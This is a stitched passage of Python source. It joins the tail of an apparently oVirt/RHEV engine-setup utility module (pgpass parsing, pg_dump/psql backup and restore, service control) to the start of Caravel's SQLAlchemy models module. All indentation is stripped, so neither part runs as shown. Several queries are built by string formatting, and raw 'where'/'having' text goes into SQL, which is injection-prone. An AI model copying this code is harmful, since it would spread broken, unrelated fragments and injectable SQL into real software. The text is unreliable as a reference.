fileBasename = os.path.basename(fileSrc)
targetFile = os.path.join(destination, fileBasename)
# Set file mode, uid and gid to the file
logging.debug("setting file %s uid/gid ownership"%(targetFile))
os.chown(targetFile, uid, gid)
logging.debug("setting file %s mode to %d"%(targetFile, filemod))
os.chmod(targetFile, filemod)
def getDbAdminUser():
"""
Retrieve Admin user from .pgpass file on the system.
Use default settings if file is not found.
"""
admin_user = getDbConfig("admin")
if admin_user:
return admin_user
return basedefs.DB_ADMIN
def getDbUser():
"""
Retrieve Admin user from .pgpass file on the system.
Use default settings if file is not found.
"""
db_user = getDbConfig("user")
if db_user:
return db_user
return basedefs.DB_USER
def getDbHostName():
"""
Retrieve DB Host name from .pgpass file on the system.
Use default settings if file is not found, or '*' was used.
"""
host = getDbConfig("host")
if host and host != "*":
return host
return basedefs.DB_HOST
def getDbPort():
"""
Retrieve DB port number from .pgpass file on the system.
Use default settings if file is not found, or '*' was used.
"""
port = getDbConfig("port")
if port:
return port
return basedefs.DB_PORT
def getDbConfig(param):
"""
Generic function to retrieve values from admin line in .pgpass
"""
# 'user' and 'admin' are the same fields, just different lines
# and for different cases
field = {'user' : 3, 'admin' : 3, 'host' : 0, 'port' : 1}
if param not in field.keys():
return False
inDbAdminSection = False
inDbUserSection = False
if (os.path.exists(basedefs.DB_PASS_FILE)):
logging.debug("found existing pgpass file, fetching DB %s value" % param)
with open (basedefs.DB_PASS_FILE) as pgPassFile:
for line in pgPassFile:
# find the line with "DB ADMIN"
if basedefs.PGPASS_FILE_ADMIN_LINE in line:
inDbAdminSection = True
continue
if inDbAdminSection and param == "admin" and \
not line.startswith("#"):
# Means we're on DB ADMIN line, as it's for all DBs
dbcreds = line.split(":", 4)
return dbcreds[field[param]]
# find the line with "DB USER"
if basedefs.PGPASS_FILE_USER_LINE in line:
inDbUserSection = True
continue
# fetch the values
if inDbUserSection:
# Means we're on DB USER line, as it's for all DBs
dbcreds = line.split(":", 4)
return dbcreds[field[param]]
return False
def backupDB(db, user, backupFile, host="localhost", port="5432"):
"""
Backup postgres db
using pgdump
Args: file - a target file to backup to
db - db name to backup
user - db user to use for backup
host - db host where postgresql server runs
port - db connection port
"""
logging.debug("%s DB Backup started"%(db))
cmd = [
basedefs.EXEC_PGDUMP,
"-C", "-E",
"UTF8",
"--column-inserts",
"--disable-dollar-quoting",
"--disable-triggers",
"--format=p",
"-f", backupFile,
"-U", user,
"-h", host,
"-p", port,
db,
]
output, rc = execCmd(cmdList=cmd, failOnError=True, msg=output_messages.ERR_DB_BACKUP)
logging.debug("%s DB Backup completed successfully"%(db))
def restoreDB(user, host, port, backupFile):
"""
Restore postgres db
using pgrestore
Args: file - a db backup file to restore from
user - db user to use for backup
host - db host where postgresql server runs
port - db connection port
"""
# Restore
logging.debug("DB Restore started")
cmd = [
basedefs.EXEC_PSQL,
"-h", host,
"-p", port,
"-U", user,
"-d", basedefs.DB_POSTGRES,
"-f", backupFile,
]
output, rc = execCmd(cmdList=cmd, failOnError=True, msg=output_messages.ERR_DB_RESTORE)
logging.debug("DB Restore completed successfully")
def renameDB(oldname, newname):
"""docstring for renameDb"""
if oldname == newname:
return
logging.info("Renaming '%s' to '%s'..." % (oldname, newname))
sqlQuery="ALTER DATABASE %s RENAME TO %s" % (oldname, newname)
execRemoteSqlCommand(getDbUser(), getDbHostName(), getDbPort(),
basedefs.DB_POSTGRES, sqlQuery, True,
output_messages.ERR_DB_RENAME % (oldname, newname))
def updateVDCOption(key, value, maskList=[], keyType='text'):
"""
Update vdc_option value in db
using rhevm-config
maskList is received to allow
masking passwords in logging
keyType can be 'text' or 'pass' for password
"""
# Mask passwords
logValue = _maskString(value, maskList)
logging.debug("updating vdc option %s to: %s"%(key, logValue))
msg = output_messages.ERR_EXP_UPD_VDC_OPTION%(key, logValue)
# The first part of the command is really simple:
cmd = [
basedefs.FILE_RHEVM_CONFIG_BIN,
]
# For text options we just provide the name of the option and the value in
# the command line, but for password options we have to put the password in
# an external file and provide the name of that file:
passFile = None
if keyType == 'pass':
passFile = mkTempPassFile(value)
cmd.extend([
'-s',
key,
'--admin-pass-file=%s' % passFile,
])
else:
cmd.extend([
'-s',
'%s=%s' % (key, value),
])
# The rest of the arguments for engine-config are the same for all kind of
# options:
cmd.extend([
'--cver=' + basedefs.VDC_OPTION_CVER,
'-p',
basedefs.FILE_RHEVM_EXTENDED_CONF,
])
# Execute the command, and always remember to remove the password file:
try:
output, rc = execCmd(cmdList=cmd, failOnError=True, msg=msg, maskList=maskList)
finally:
if passFile:
os.remove(passFile)
def mkTempPassFile(value):
t = tempfile.NamedTemporaryFile(delete=False)
t.file.write(value)
t.file.close()
return t.name
def _maskString(string, maskList=[]):
"""
private func to mask passwords
in utils
"""
maskedStr = string
for maskItem in maskList:
maskedStr = maskedStr.replace(maskItem, "*"*8)
return maskedStr
def getRpmVersion(rpmName=basedefs.ENGINE_RPM_NAME):
"""
extracts rpm version
from a given rpm package name
default rpm is 'rhevm'
returns version (string)
"""
# Update build number on welcome page
logging.debug("retrieving build number for %s rpm"%(rpmName))
cmd = [
basedefs.EXEC_RPM,
"-q",
"--queryformat", "'%{VERSION}-%{RELEASE}'",
rpmName,
]
rpmVersion, rc = execCmd(cmdList=cmd, failOnError=True, msg=output_messages.ERR_READ_RPM_VER % rpmName)
# Return rpm version
return rpmVersion
def retry(func, expectedException=Exception, tries=None, timeout=None, sleep=1):
"""
Retry a function. Wraps the retry logic so you don't have to
implement it each time you need it.
:param func: The callable to run.
:param expectedException: The exception you expect to receive when the function fails.
:param tries: The number of time to try. None\0,-1 means infinite.
:param timeout: The time you want to spend waiting. This **WILL NOT** stop the method.
It will just not run it if it ended after the timeout.
:param sleep: Time to sleep between calls in seconds.
"""
if tries in [0, None]:
tries = -1
if timeout in [0, None]:
timeout = -1
startTime = time.time()
while True:
tries -= 1
try:
return func()
except expectedException:
if tries == 0:
raise
if (timeout > 0) and ((time.time() - startTime) > timeout):
raise
time.sleep(sleep)
def checkIfDbIsUp():
"""
func to test is db is up
will throw exception on error
and not return a value
"""
logging.debug("checking if db is already installed and running..")
execRemoteSqlCommand(getDbUser(), getDbHostName(), getDbPort(), basedefs.DB_NAME, "select 1", True)
def localHost(hostname):
# Create an ip set of possible IPs on the machine. Set has only unique values, so
# there's no problem with union.
# TODO: cache the list somehow? There's no poing quering the IP configuraion all the time.
ipset = getConfiguredIps().union(set([ "localhost", "127.0.0.1"]))
if hostname in ipset:
return True
return False
def clearDbConnections(dbName):
""" Lock local DB and clear active connections """
# Block new connections first
logging.info("Closing DB '%s' for new connections" % dbName)
query = "update pg_database set datallowconn = 'false' where datname = '%s';" % dbName
cmd = [
basedefs.EXEC_PSQL,
"-U", getDbAdminUser(),
"-c", query,
]
execCmd(cmdList=cmd, failOnError=True, msg=output_messages.ERR_DB_CONNECTIONS_BLOCK)
# Disconnect active connections
logging.info("Disconnect active connections from DB '%s'" % dbName)
query = "SELECT pg_terminate_backend(procpid) FROM pg_stat_activity WHERE datname = '%s'" % dbName
cmd = [
basedefs.EXEC_PSQL,
"-U", getDbAdminUser(),
"-c", query,
]
execCmd(cmdList=cmd, failOnError=True, msg=output_messages.ERR_DB_CONNECTIONS_CLEAR)
def listTempDbs():
""" Create a list of temp DB's on the server with regex 'engine_*' """
dbListRemove = [basedefs.DB_NAME]
cmd = [
basedefs.EXEC_PSQL,
"-U", getDbAdminUser(),
"-h", getDbHostName(),
"-p", getDbPort(),
"--list",
]
output, rc = execCmd(cmdList=cmd, msg=output_messages.ERR_DB_TEMP_LIST)
if rc:
logging.error(output_messages.ERR_DB_TEMP_LIST)
raise Exception ("\n" + output_messages.ERR_DB_TEMP_LIST + "\n")
# if there are temp DB that need to be removed, add them to DB list
tempDbs = re.findall("^engine_\w*", output)
if len(tempDbs) > 0:
dbListRemove.extend(tempDbs)
return dbListRemove
# TODO: Support SystemD services
class Service():
def __init__(self, name):
self.wasStopped = False
self.wasStarted = False
self.name = name
def isServiceAvailable(self):
if os.path.exists("/etc/init.d/%s" % self.name):
return True
return False
def start(self, raiseFailure = False):
logging.debug("starting %s", self.name)
(output, rc) = self._serviceFacility("start")
if rc == 0:
self.wasStarted = True
elif raiseFailure:
raise Exception(output_messages.ERR_FAILED_START_SERVICE % self.name)
return (output, rc)
def stop(self, raiseFailure = False):
logging.debug("stopping %s", self.name)
(output, rc) = self._serviceFacility("stop")
if rc == 0:
self.wasStopped = True
elif raiseFailure:
raise Exception(output_messages.ERR_FAILED_STOP_SERVICE % self.name)
return (output, rc)
def autoStart(self, start=True):
mode = "on" if start else "off"
cmd = [
basedefs.EXEC_CHKCONFIG, self.name, mode,
]
execCmd(cmdList=cmd, failOnError=True)
def conditionalStart(self, raiseFailure = False):
"""
Will only start if wasStopped is set to True
"""
if self.wasStopped:
logging.debug("Service %s was stopped. starting it again"%self.name)
return self.start(raiseFailure)
else:
logging.debug("Service was not stopped. there for we're not starting it")
return (False, False)
def status(self):
logging.debug("getting status for %s", self.name)
(output, rc) = self._serviceFacility("status")
return (output, rc)
def _serviceFacility(self, action):
"""
Execute the command "service NAME action"
returns: output, rc
"""
logging.debug("executing action %s on service %s", self.name, action)
cmd = [
basedefs.EXEC_SERVICE, self.name, action
]
return execCmd(cmdList=cmd, usePipeFiles=True)
def chown(target,uid, gid):
logging.debug("chown %s to %s:%s" % (target, uid, gid))
os.chown(target, uid, gid)
def chownToEngine(target):
uid = getUsernameId(basedefs.ENGINE_USER_NAME)
gid = getGroupId(basedefs.ENGINE_GROUP_NAME)
chown(target, uid, gid)
def installed(rpm):
cmd = [
basedefs.EXEC_RPM,
"-q",
rpm,
]
output, rc = execCmd(cmd)
return rc == 0
def setHttpPortsToNonProxyDefault(controller):
logging.debug("Changing HTTP_PORT & HTTPS_PORT to the default non-proxy values (8080 & 8443)")
httpParam = controller.getParamByName("HTTP_PORT")
httpParam.setKey("DEFAULT_VALUE", basedefs.JBOSS_HTTP_PORT)
httpParam = controller.getParamByName("HTTPS_PORT")
httpParam.setKey("DEFAULT_VALUE", basedefs.JBOSS_HTTPS_PORT)
|
|
"""A collection of ORM sqlalchemy models for Caravel"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import functools
import json
import logging
import textwrap
from collections import namedtuple
from copy import deepcopy, copy
from datetime import timedelta, datetime, date
import humanize
import pandas as pd
import requests
import sqlalchemy as sqla
import sqlparse
from dateutil.parser import parse
from flask import request, g
from flask_appbuilder import Model
from flask_appbuilder.models.mixins import AuditMixin
from flask_appbuilder.models.decorators import renders
from flask_babel import lazy_gettext as _
from pydruid.client import PyDruid
from pydruid.utils.filters import Dimension, Filter
from pydruid.utils.postaggregator import Postaggregator
from pydruid.utils.having import Aggregation
from six import string_types
from sqlalchemy import (
Column, Integer, String, ForeignKey, Text, Boolean, DateTime, Date,
Table, create_engine, MetaData, desc, asc, select, and_, func)
from sqlalchemy.engine import reflection
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import relationship
from sqlalchemy.sql import table, literal_column, text, column
from sqlalchemy_utils import EncryptedType
import caravel
from caravel import app, db, get_session, utils, sm
from caravel.viz import viz_types
from caravel.utils import flasher, MetricPermException, DimSelector
config = app.config
QueryResult = namedtuple('namedtuple', ['df', 'query', 'duration'])
class JavascriptPostAggregator(Postaggregator):
def __init__(self, name, field_names, function):
self.post_aggregator = {
'type': 'javascript',
'fieldNames': field_names,
'name': name,
'function': function,
}
self.name = name
class AuditMixinNullable(AuditMixin):
"""Altering the AuditMixin to use nullable fields
Allows creating objects programmatically outside of CRUD
"""
created_on = Column(DateTime, default=datetime.now, nullable=True)
changed_on = Column(
DateTime, default=datetime.now,
onupdate=datetime.now, nullable=True)
@declared_attr
def created_by_fk(cls): # noqa
return Column(Integer, ForeignKey('ab_user.id'),
default=cls.get_user_id, nullable=True)
@declared_attr
def changed_by_fk(cls): # noqa
return Column(
Integer, ForeignKey('ab_user.id'),
default=cls.get_user_id, onupdate=cls.get_user_id, nullable=True)
@renders('created_on')
def creator(self): # noqa
return '{}'.format(self.created_by or '')
@property
def changed_by_(self):
return '{}'.format(self.changed_by or '')
@renders('changed_on')
def changed_on_(self):
return '<span class="no-wrap">{}</span>'.format(self.changed_on)
@renders('changed_on')
def modified(self):
s = humanize.naturaltime(datetime.now() - self.changed_on)
return '<span class="no-wrap">{}</nobr>'.format(s)
@property
def icons(self):
return """
<a
href="{self.datasource_edit_url}"
data-toggle="tooltip"
title="{self.datasource}">
<i class="fa fa-database"></i>
</a>
""".format(**locals())
class Url(Model, AuditMixinNullable):
"""Used for the short url feature"""
__tablename__ = 'url'
id = Column(Integer, primary_key=True)
url = Column(Text)
class CssTemplate(Model, AuditMixinNullable):
"""CSS templates for dashboards"""
__tablename__ = 'css_templates'
id = Column(Integer, primary_key=True)
template_name = Column(String(250))
css = Column(Text, default='')
slice_user = Table('slice_user', Model.metadata,
Column('id', Integer, primary_key=True),
Column('user_id', Integer, ForeignKey('ab_user.id')),
Column('slice_id', Integer, ForeignKey('slices.id'))
)
class Slice(Model, AuditMixinNullable):
"""A slice is essentially a report or a view on data"""
__tablename__ = 'slices'
id = Column(Integer, primary_key=True)
slice_name = Column(String(250))
druid_datasource_id = Column(Integer, ForeignKey('datasources.id'))
table_id = Column(Integer, ForeignKey('tables.id'))
datasource_type = Column(String(200))
datasource_name = Column(String(2000))
viz_type = Column(String(250))
params = Column(Text)
description = Column(Text)
cache_timeout = Column(Integer)
perm = Column(String(2000))
table = relationship(
'SqlaTable', foreign_keys=[table_id], backref='slices')
druid_datasource = relationship(
'DruidDatasource', foreign_keys=[druid_datasource_id], backref='slices')
owners = relationship("User", secondary=slice_user)
def __repr__(self):
return self.slice_name
@property
def datasource(self):
return self.table or self.druid_datasource
@renders('datasource_name')
def datasource_link(self):
if self.table:
return self.table.link
elif self.druid_datasource:
return self.druid_datasource.link
@property
def datasource_edit_url(self):
if self.table:
return self.table.url
elif self.druid_datasource:
return self.druid_datasource.url
@property
@utils.memoized
def viz(self):
d = json.loads(self.params)
viz_class = viz_types[self.viz_type]
return viz_class(self.datasource, form_data=d)
@property
def description_markeddown(self):
return utils.markdown(self.description)
@property
def datasource_id(self):
return self.table_id or self.druid_datasource_id
@property
def data(self):
"""Data used to render slice in templates"""
d = {}
self.token = ''
try:
d = self.viz.data
self.token = d.get('token')
except Exception as e:
d['error'] = str(e)
d['slice_id'] = self.id
d['slice_name'] = self.slice_name
d['description'] = self.description
d['slice_url'] = self.slice_url
d['edit_url'] = self.edit_url
d['description_markeddown'] = self.description_markeddown
return d
@property
def json_data(self):
return json.dumps(self.data)
@property
def slice_url(self):
"""Defines the url to access the slice"""
try:
slice_params = json.loads(self.params)
except Exception as e:
logging.exception(e)
slice_params = {}
slice_params['slice_id'] = self.id
slice_params['json'] = "false"
slice_params['slice_name'] = self.slice_name
from werkzeug.urls import Href
href = Href(
"/caravel/explore/{obj.datasource_type}/"
"{obj.datasource_id}/".format(obj=self))
return href(slice_params)
@property
def edit_url(self):
return "/slicemodelview/edit/{}".format(self.id)
@property
def slice_link(self):
url = self.slice_url
return '<a href="{url}">{obj.slice_name}</a>'.format(
url=url, obj=self)
def set_perm(mapper, connection, target): # noqa
if target.table_id:
src_class = SqlaTable
id_ = target.table_id
elif target.druid_datasource_id:
src_class = DruidDatasource
id_ = target.druid_datasource_id
ds = db.session.query(src_class).filter_by(id=int(id_)).first()
target.perm = ds.perm
sqla.event.listen(Slice, 'before_insert', set_perm)
sqla.event.listen(Slice, 'before_update', set_perm)
dashboard_slices = Table(
'dashboard_slices', Model.metadata,
Column('id', Integer, primary_key=True),
Column('dashboard_id', Integer, ForeignKey('dashboards.id')),
Column('slice_id', Integer, ForeignKey('slices.id')),
)
dashboard_user = Table(
'dashboard_user', Model.metadata,
Column('id', Integer, primary_key=True),
Column('user_id', Integer, ForeignKey('ab_user.id')),
Column('dashboard_id', Integer, ForeignKey('dashboards.id'))
)
class Dashboard(Model, AuditMixinNullable):
"""The dashboard object!"""
__tablename__ = 'dashboards'
id = Column(Integer, primary_key=True)
dashboard_title = Column(String(500))
position_json = Column(Text)
description = Column(Text)
css = Column(Text)
json_metadata = Column(Text)
slug = Column(String(255), unique=True)
slices = relationship(
'Slice', secondary=dashboard_slices, backref='dashboards')
owners = relationship("User", secondary=dashboard_user)
def __repr__(self):
return self.dashboard_title
@property
def table_names(self):
return ", ".join({"{}".format(s.datasource) for s in self.slices})
@property
def url(self):
return "/caravel/dashboard/{}/".format(self.slug or self.id)
@property
def metadata_dejson(self):
if self.json_metadata:
return json.loads(self.json_metadata)
else:
return {}
def dashboard_link(self):
return '<a href="{obj.url}">{obj.dashboard_title}</a>'.format(obj=self)
@property
def json_data(self):
d = {
'id': self.id,
'metadata': self.metadata_dejson,
'dashboard_title': self.dashboard_title,
'slug': self.slug,
'slices': [slc.data for slc in self.slices],
'position_json': json.loads(self.position_json) if self.position_json else [],
}
return json.dumps(d)
class Queryable(object):
"""A common interface to objects that are queryable (tables and datasources)"""
@property
def column_names(self):
return sorted([c.column_name for c in self.columns])
@property
def main_dttm_col(self):
return "timestamp"
@property
def groupby_column_names(self):
return sorted([c.column_name for c in self.columns if c.groupby])
@property
def filterable_column_names(self):
return sorted([c.column_name for c in self.columns if c.filterable])
@property
def dttm_cols(self):
return []
@property
def url(self):
return '/{}/edit/{}'.format(self.baselink, self.id)
@property
def explore_url(self):
if self.default_endpoint:
return self.default_endpoint
else:
return "/caravel/explore/{obj.type}/{obj.id}/".format(obj=self)
class Database(Model, AuditMixinNullable):
"""An ORM object that stores Database related information"""
__tablename__ = 'dbs'
id = Column(Integer, primary_key=True)
database_name = Column(String(250), unique=True)
sqlalchemy_uri = Column(String(1024))
password = Column(EncryptedType(String(1024), config.get('SECRET_KEY')))
cache_timeout = Column(Integer)
extra = Column(Text, default=textwrap.dedent("""\
{
"metadata_params": {},
"engine_params": {}
}
"""))
def __repr__(self):
return self.database_name
def get_sqla_engine(self):
extra = self.get_extra()
params = extra.get('engine_params', {})
return create_engine(self.sqlalchemy_uri_decrypted, **params)
def safe_sqlalchemy_uri(self):
return self.sqlalchemy_uri
def grains(self):
"""Defines time granularity database-specific expressions.
The idea here is to make it easy for users to change the time grain
form a datetime (maybe the source grain is arbitrary timestamps, daily
or 5 minutes increments) to another, "truncated" datetime. Since
each database has slightly different but similar datetime functions,
this allows a mapping between database engines and actual functions.
"""
Grain = namedtuple('Grain', 'name label function')
db_time_grains = {
'presto': (
Grain('Time Column', _('Time Column'), '{col}'),
Grain('second', _('second'),
"date_trunc('second', CAST({col} AS TIMESTAMP))"),
Grain('minute', _('minute'),
"date_trunc('minute', CAST({col} AS TIMESTAMP))"),
Grain('hour', _('hour'),
"date_trunc('hour', CAST({col} AS TIMESTAMP))"),
Grain('day', _('day'),
"date_trunc('day', CAST({col} AS TIMESTAMP))"),
Grain('week', _('week'),
"date_trunc('week', CAST({col} AS TIMESTAMP))"),
Grain('month', _('month'),
"date_trunc('month', CAST({col} AS TIMESTAMP))"),
Grain('quarter', _('quarter'),
"date_trunc('quarter', CAST({col} AS TIMESTAMP))"),
Grain("week_ending_saturday", _('week_ending_saturday'),
"date_add('day', 5, date_trunc('week', date_add('day', 1, "
"CAST({col} AS TIMESTAMP))))"),
Grain("week_start_sunday", _('week_start_sunday'),
"date_add('day', -1, date_trunc('week', "
"date_add('day', 1, CAST({col} AS TIMESTAMP))))"),
),
'mysql': (
Grain('Time Column', _('Time Column'), '{col}'),
Grain("second", _('second'), "DATE_ADD(DATE({col}), "
"INTERVAL (HOUR({col})*60*60 + MINUTE({col})*60"
" + SECOND({col})) SECOND)"),
Grain("minute", _('minute'), "DATE_ADD(DATE({col}), "
"INTERVAL (HOUR({col})*60 + MINUTE({col})) MINUTE)"),
Grain("hour", _('hour'), "DATE_ADD(DATE({col}), "
"INTERVAL HOUR({col}) HOUR)"),
Grain('day', _('day'), 'DATE({col})'),
Grain("week", _('week'), "DATE(DATE_SUB({col}, "
"INTERVAL DAYOFWEEK({col}) - 1 DAY))"),
Grain("month", _('month'), "DATE(DATE_SUB({col}, "
"INTERVAL DAYOFMONTH({col}) - 1 DAY))"),
),
'sqlite': (
Grain('Time Column', _('Time Column'), '{col}'),
Grain('day', _('day'), 'DATE({col})'),
Grain("week", _('week'),
"DATE({col}, -strftime('%w', {col}) || ' days')"),
Grain("month", _('month'),
"DATE({col}, -strftime('%d', {col}) || ' days')"),
),
'postgresql': (
Grain("Time Column", _('Time Column'), "{col}"),
Grain("second", _('second'), "DATE_TRUNC('second', {col})"),
Grain("minute", _('minute'), "DATE_TRUNC('minute', {col})"),
Grain("hour", _('hour'), "DATE_TRUNC('hour', {col})"),
Grain("day", _('day'), "DATE_TRUNC('day', {col})"),
Grain("week", _('week'), "DATE_TRUNC('week', {col})"),
Grain("month", _('month'), "DATE_TRUNC('month', {col})"),
Grain("year", _('year'), "DATE_TRUNC('year', {col})"),
),
}
db_time_grains['redshift'] = db_time_grains['postgresql']
db_time_grains['vertica'] = db_time_grains['postgresql']
for db_type, grains in db_time_grains.items():
if self.sqlalchemy_uri.startswith(db_type):
return grains
def grains_dict(self):
return {grain.name: grain for grain in self.grains()}
def get_extra(self):
extra = {}
if self.extra:
try:
extra = json.loads(self.extra)
except Exception as e:
logging.error(e)
return extra
def get_table(self, table_name, schema=None):
extra = self.get_extra()
meta = MetaData(**extra.get('metadata_params', {}))
return Table(
table_name, meta,
schema=schema or None,
autoload=True,
autoload_with=self.get_sqla_engine())
def get_columns(self, table_name):
engine = self.get_sqla_engine()
insp = reflection.Inspector.from_engine(engine)
return insp.get_columns(table_name)
@property
def sqlalchemy_uri_decrypted(self):
conn = sqla.engine.url.make_url(self.sqlalchemy_uri)
conn.password = self.password
return str(conn)
@property
def sql_url(self):
return '/caravel/sql/{}/'.format(self.id)
@property
def sql_link(self):
return '<a href="{}">SQL</a>'.format(self.sql_url)
@property
def perm(self):
return (
"[{obj.database_name}].(id:{obj.id})").format(obj=self)
class SqlaTable(Model, Queryable, AuditMixinNullable):
"""An ORM object for SqlAlchemy table references"""
type = "table"
__tablename__ = 'tables'
id = Column(Integer, primary_key=True)
table_name = Column(String(250))
main_dttm_col = Column(String(250))
description = Column(Text)
default_endpoint = Column(Text)
database_id = Column(Integer, ForeignKey('dbs.id'), nullable=False)
is_featured = Column(Boolean, default=False)
user_id = Column(Integer, ForeignKey('ab_user.id'))
owner = relationship('User', backref='tables', foreign_keys=[user_id])
database = relationship(
'Database', backref='tables', foreign_keys=[database_id])
offset = Column(Integer, default=0)
cache_timeout = Column(Integer)
schema = Column(String(255))
table_columns = relationship("TableColumn", back_populates="table")
baselink = "tablemodelview"
__table_args__ = (
sqla.UniqueConstraint(
'database_id', 'schema', 'table_name',
name='_customer_location_uc'),)
def __repr__(self):
return self.table_name
@property
def description_markeddown(self):
return utils.markdown(self.description)
@property
def link(self):
return '<a href="{self.url}">{self.table_name}</a>'.format(**locals())
@property
def perm(self):
return (
"[{obj.database}].[{obj.table_name}]"
"(id:{obj.id})").format(obj=self)
@property
def full_name(self):
return "[{obj.database}].[{obj.table_name}]".format(obj=self)
@property
def dttm_cols(self):
l = [c.column_name for c in self.columns if c.is_dttm]
if self.main_dttm_col not in l:
l.append(self.main_dttm_col)
return l
@property
def num_cols(self):
return [c.column_name for c in self.columns if c.isnum]
@property
def any_dttm_col(self):
cols = self.dttm_cols
if cols:
return cols[0]
@property
def html(self):
t = ((c.column_name, c.type) for c in self.columns)
df = pd.DataFrame(t)
df.columns = ['field', 'type']
return df.to_html(
index=False,
classes=(
"dataframe table table-striped table-bordered "
"table-condensed"))
@property
def name(self):
return self.table_name
@renders('table_name')
def table_link(self):
return '<a href="{obj.explore_url}">{obj.table_name}</a>'.format(obj=self)
@property
def metrics_combo(self):
return sorted(
[
(m.metric_name, m.verbose_name or m.metric_name)
for m in self.metrics],
key=lambda x: x[1])
@property
def sql_url(self):
return self.database.sql_url + "?table_name=" + str(self.table_name)
@property
def sql_link(self):
return '<a href="{}">SQL</a>'.format(self.sql_url)
def get_col(self, col_name):
columns = self.table_columns
for col in columns:
if col_name == col.column_name:
return col
def query( # sqla
self, groupby, metrics,
granularity,
from_dttm, to_dttm,
filter=None, # noqa
is_timeseries=True,
timeseries_limit=15, row_limit=None,
inner_from_dttm=None, inner_to_dttm=None,
orderby=None,
extras=None,
columns=None):
"""Querying any sqla table from this common interface"""
# For backward compatibility
if granularity not in self.dttm_cols:
granularity = self.main_dttm_col
cols = {col.column_name: col for col in self.columns}
metrics_dict = {m.metric_name: m for m in self.metrics}
qry_start_dttm = datetime.now()
if not granularity and is_timeseries:
raise Exception(_(
"Datetime column not provided as part table configuration "
"and is required by this type of chart"))
metrics_exprs = [metrics_dict.get(m).sqla_col for m in metrics]
if metrics:
main_metric_expr = metrics_exprs[0]
else:
main_metric_expr = literal_column("COUNT(*)").label("ccount")
select_exprs = []
groupby_exprs = []
if groupby:
select_exprs = []
inner_select_exprs = []
inner_groupby_exprs = []
for s in groupby:
col = cols[s]
outer = col.sqla_col
inner = col.sqla_col.label(col.column_name + '__')
groupby_exprs.append(outer)
select_exprs.append(outer)
inner_groupby_exprs.append(inner)
inner_select_exprs.append(inner)
elif columns:
for s in columns:
select_exprs.append(cols[s].sqla_col)
metrics_exprs = []
if granularity:
dttm_col = cols[granularity]
dttm_expr = dttm_col.sqla_col.label('timestamp')
timestamp = dttm_expr
# Transforming time grain into an expression based on configuration
time_grain_sqla = extras.get('time_grain_sqla')
if time_grain_sqla:
udf = self.database.grains_dict().get(time_grain_sqla, '{col}')
timestamp_grain = literal_column(
udf.function.format(col=dttm_expr)).label('timestamp')
else:
timestamp_grain = timestamp
if is_timeseries:
select_exprs += [timestamp_grain]
groupby_exprs += [timestamp_grain]
outer_from = text(dttm_col.dttm_sql_literal(from_dttm))
outer_to = text(dttm_col.dttm_sql_literal(to_dttm))
time_filter = [
timestamp >= outer_from,
timestamp <= outer_to,
]
inner_time_filter = copy(time_filter)
if inner_from_dttm:
inner_time_filter[0] = timestamp >= text(
dttm_col.dttm_sql_literal(inner_from_dttm))
if inner_to_dttm:
inner_time_filter[1] = timestamp <= text(
dttm_col.dttm_sql_literal(inner_to_dttm))
else:
inner_time_filter = []
select_exprs += metrics_exprs
qry = select(select_exprs)
tbl = table(self.table_name)
if self.schema:
tbl.schema = self.schema
if not columns:
qry = qry.group_by(*groupby_exprs)
where_clause_and = []
having_clause_and = []
for col, op, eq in filter:
col_obj = cols[col]
if op in ('in', 'not in'):
values = eq.split(",")
cond = col_obj.sqla_col.in_(values)
if op == 'not in':
cond = ~cond
where_clause_and.append(cond)
if extras and 'where' in extras:
where_clause_and += [text(extras['where'])]
if extras and 'having' in extras:
having_clause_and += [text(extras['having'])]
if granularity:
qry = qry.where(and_(*(time_filter + where_clause_and)))
else:
qry = qry.where(and_(*where_clause_and))
qry = qry.having(and_(*having_clause_and))
if groupby:
qry = qry.order_by(desc(main_metric_expr))
elif orderby:
for col, ascending in orderby:
direction = asc if ascending else desc
qry = qry.order_by(direction(col))
qry = qry.limit(row_limit)
if timeseries_limit and groupby:
# some sql dialects require for order by expressions
# to also be in the select clause
inner_select_exprs += [main_metric_expr]
subq = select(inner_select_exprs)
subq = subq.select_from(tbl)
subq = subq.where(and_(*(where_clause_and + inner_time_filter)))
subq = subq.group_by(*inner_groupby_exprs)
subq = subq.order_by(desc(main_metric_expr))
subq = subq.limit(timeseries_limit)
on_clause = []
for i, gb in enumerate(groupby):
on_clause.append(
groupby_exprs[i] == column(gb + '__'))
tbl = tbl.join(subq.alias(), and_(*on_clause))
qry = qry.select_from(tbl)
engine = self.database.get_sqla_engine()
sql = "{}".format(
qry.compile(
engine, compile_kwargs={"literal_binds": True},),
)
df = pd.read_sql_query(
sql=sql,
con=engine
)
sql = sqlparse.format(sql, reindent=True)
return QueryResult(
df=df, duration=datetime.now() - qry_start_dttm, query=sql)
def fetch_metadata(self):
"""Fetches the metadata for the table and merges it in"""
try:
table = self.database.get_table(self.table_name, schema=self.schema)
except Exception as e:
flasher(str(e))
flasher(
"Table doesn't seem to exist in the specified database, "
"couldn't fetch column information", "danger")
return
TC = TableColumn # noqa shortcut to class
M = SqlMetric # noqa
metrics = []
any_date_col = None
for col in table.columns:
try:
datatype = "{}".format(col.type).upper()
except Exception as e:
datatype = "UNKNOWN"
logging.error(
"Unrecognized data type in {}.{}".format(table, col.name))
logging.exception(e)
dbcol = (
db.session
.query(TC)
.filter(TC.table == self)
.filter(TC.column_name == col.name)
.first()
)
db.session.flush()
if not dbcol:
dbcol = TableColumn(column_name=col.name, type=datatype)
dbcol.groupby = dbcol.is_string
dbcol.filterable = dbcol.is_string
dbcol.sum = dbcol.isnum
dbcol.is_dttm = dbcol.is_time
db.session.merge(self)
self.columns.append(dbcol)
if not any_date_col and dbcol.is_time:
any_date_col = col.name
quoted = "{}".format(
column(dbcol.column_name).compile(dialect=db.engine.dialect))
if dbcol.sum:
metrics.append(M(
metric_name='sum__' + dbcol.column_name,
verbose_name='sum__' + dbcol.column_name,
metric_type='sum',
expression="SUM({})".format(quoted)
))
if dbcol.max:
metrics.append(M(
metric_name='max__' + dbcol.column_name,
verbose_name='max__' + dbcol.column_name,
metric_type='max',
expression="MAX({})".format(quoted)
))
if dbcol.min:
metrics.append(M(
metric_name='min__' + dbcol.column_name,
verbose_name='min__' + dbcol.column_name,
metric_type='min',
expression="MIN({})".format(quoted)
))
if dbcol.count_distinct:
metrics.append(M(
metric_name='count_distinct__' + dbcol.column_name,
verbose_name='count_distinct__' + dbcol.column_name,
metric_type='count_distinct',
expression="COUNT(DISTINCT {})".format(quoted)
))
dbcol.type = datatype
db.session.merge(self)
db.session.commit()
